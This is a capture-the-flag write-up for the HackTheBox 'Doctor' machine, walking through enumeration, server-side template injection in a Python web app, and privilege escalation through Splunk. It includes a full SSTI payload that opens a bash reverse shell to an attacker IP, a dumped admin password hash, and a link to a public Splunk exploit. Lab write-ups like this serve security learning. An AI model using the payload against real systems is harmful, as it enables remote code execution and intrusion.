HTB Doctor
Writeup for Doctor box on HackTheBox.eu
Initial enumeration
Found port 22 80 and 8089 open on the box.
While browsing the IP we discover a hostname doctors.htb, after setting this host and accessing the page we find a new portal:
After registering an account we discover we can post messages. Inspecting the sourcode of the page we also find a /archive page which seems to be under development however if we post a new message, the title of the message appears in the xml feed.
Since this is python application it's worth checking for SSTI - Server side template injection
The first payload we can try is a simple {{ 4 * 4 }} which will output as 16 in the title if the exploit work. This works as expected and we can proceed to a more complex payload:
title={{ get_flashed_messages.__globals__.__builtins__.open("/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/10.10.14.38/8443 0>%261'",shell=True) }}&content=a&submit=Post
User enumeration
We are the user web
[email protected]:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
Running LinPeas
--> Found interesting column names in user (output limit 10)
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(20) NOT NULL,
email VARCHAR(120) NOT NULL,
image_file VARCHAR(20) NOT NULL,
password VARCHAR(60) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username),
UNIQUE (email)
)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S
In var/log/apache2 there is a backup file where we can see something strange:
The string from the backup works for sudo as shaun
Privilege escalation
Splunkd app command execution exploit
Using the exploit from https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_remote.py
